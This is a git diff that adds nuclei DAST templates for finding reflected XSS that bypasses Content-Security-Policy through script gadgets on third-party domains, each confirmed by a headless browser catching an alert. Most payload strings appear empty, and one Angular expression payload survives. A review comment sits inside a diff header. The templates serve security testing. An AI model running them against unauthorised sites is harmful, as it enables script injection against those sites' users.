@@ -1,51 +0,0 @@ -id: googleapis-csp-xss - -info: - name: Content-Security-Policy Bypass via GoogleAPIS - author: DhiyaneshDK - severity: high - reference: - - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L188 - - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L189C5-L189C19 - metadata: - verified: true - tags: xss,csp-bypass,googleapis - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - injection: - - '' - - '' - - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{injection}}" - - - type: word - part: content_type - words: - - "text/html" - - - type: word - part: content_security_policy - words: - - "googleapis.com" - - "script-src" - condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml b/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml new file mode 100644 index 00000000000..afc73573aa4 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml 
@@ -0,0 +1,55 @@
+id: graph-facebook-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Facebook Graph API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,facebook
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: graph_facebook_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "graph_facebook_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml b/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml
new file mode 100644
index 00000000000..8197cc4c4d5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: grubhub-assets-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Grubhub Assets
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,grubhub
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: grubhub_assets_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "grubhub_assets_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml
new file mode 100644
index 00000000000..ada648006e0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: gstatic-angular-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Gstatic Angular JS Bundle
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gstatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: gstatic_angular_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "gstatic_angular_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml
deleted file mode 100644
index 28f1e94d860..00000000000
--- a/dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@ -id: gstatic-csp-xss - -info: - name: Content-Security-Policy Bypass via Gstatic - author: DhiyaneshDK - severity: high - reference: - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L196C17-L196C169 - metadata: - verified: true - tags: xss,csp-bypass,gstatic - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - injection: - - "" - - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{injection}}" - - - type: word - part: content_type - words: - - "text/html" - - - type: word - part: content_security_policy - words: - - "www.gstatic.com" - - "script-src" - condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml new file mode 100644 index 00000000000..063e6aac69c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml 
@@ -0,0 +1,55 @@
+id: gstatic-recaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Gstatic ReCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gstatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: gstatic_recaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "gstatic_recaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml
new file mode 100644
index 00000000000..0a69a663751
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: gum-criteo-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Criteo Gum
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,criteo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: gum_criteo_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "gum_criteo_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml b/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml
new file mode 100644
index 00000000000..397bf5aa222
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: hatenaapis-bookmark-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Hatenaapis Bookmark
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,hatenaapis
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: hatenaapis_bookmark_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "hatenaapis_bookmark_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..3e7e3c6cabb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: hcaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via hCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,hcaptcha
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: hcaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "hcaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml b/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml
new file mode 100644
index 00000000000..73c3eb981b2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: help-afterpay-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Afterpay Help
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,afterpay
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: help_afterpay_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "help_afterpay_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml
new file mode 100644
index 00000000000..b5a911fa093
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ib-adnxs-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via AppNexus
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,adnxs
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ib_adnxs_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ib_adnxs_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml b/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml
new file mode 100644
index 00000000000..5879e3da6c1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: info-cloudflare-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Cloudflare Info
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,cloudflare
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: info_cloudflare_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "info_cloudflare_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml
new file mode 100644
index 00000000000..5bc836a2192
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: info-elastic-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Elastic Info
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,elastic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: info_elastic_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "info_elastic_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml b/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml
new file mode 100644
index 00000000000..5fedee67ae4
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: inno-blob-core-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Azure Blob Storage
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,azure
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
foo
{{ [1].reduce(value.alert, 1); }}
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: inno_blob_core_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "inno_blob_core_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml b/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml
new file mode 100644
index 00000000000..af67727c77e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: investor-coinbase-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Coinbase Investor
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,coinbase
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: investor_coinbase_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "investor_coinbase_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml
new file mode 100644
index 00000000000..b0ed307cdd2
--- /dev/null
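Review bot: The inno-blob-core payload contains `{{ [1].reduce(value.alert, 1); }}`, which uses nuclei's own `{{ }}` expression delimiters; it is worth confirming on a debug-rendered request that the engine sends that text literally rather than trying to evaluate it, and that `url_encode(injection)` and the `{{injection}}` body matcher end up agreeing on the same bytes. If the line breaks shown inside the single-quoted scalar are in the committed file and not an artifact of this view, YAML folds them into single spaces, so the value the body matcher looks for will not contain the newlines the author may expect. The google-ajax payload earlier in this patch shows the same break inside its quoted scalar.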
+++ b/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ipify-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Ipify API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ipify
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ipify_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ipify_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml
new file mode 100644
index 00000000000..5f64443de19
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ipinfo-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IPInfo
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ipinfo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ipinfo_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ipinfo_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml b/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml
new file mode 100644
index 00000000000..5ddecf3ae24
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml
@@ -0,0 +1,55 @@ +id: itunes-apple-csp-xss + +info: + name: Content-Security-Policy Bypass via iTunes + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,itunes + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: itunes_apple_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "itunes_apple_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml new file mode 100644 index 00000000000..06187ab405f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: jd-api-csp-xss + +info: + name: Content-Security-Policy Bypass via JD API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,jd + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: jd_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "jd_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml new file mode 100644 index 00000000000..cd54da677fe --- /dev/null +++ b/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: js-hcaptcha-csp-xss + +info: + name: Content-Security-Policy Bypass via JS hCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,hcaptcha + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: js_hcaptcha_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "js_hcaptcha_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml b/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml new file mode 100644 index 00000000000..b78798f895c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml @@ -0,0 +1,55 @@ +id: js-smb-ovoenergy-csp-xss + +info: + name: Content-Security-Policy Bypass via OVO Energy JS SMB + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ovoenergy + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: js_smb_ovoenergy_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "js_smb_ovoenergy_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml b/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml new file mode 100644 index 00000000000..6bf53a6f9dd --- /dev/null +++ b/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml @@ -0,0 +1,55 @@ +id: kbcprod-service-now-csp-xss + +info: + name: Content-Security-Policy Bypass via ServiceNow KBCProd + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,servicenow + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: kbcprod_service_now_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "kbcprod_service_now_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml new file mode 100644 index 00000000000..898f7fda86f --- /dev/null 
+++ b/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml @@ -0,0 +1,55 @@ +id: lghnh-mkt-prod1-adobe-csp-xss + +info: + name: Content-Security-Policy Bypass via Adobe Campaign + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,adobe + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: lghnh_mkt_prod1_adobe_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "lghnh_mkt_prod1_adobe_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml new file mode 100644 index 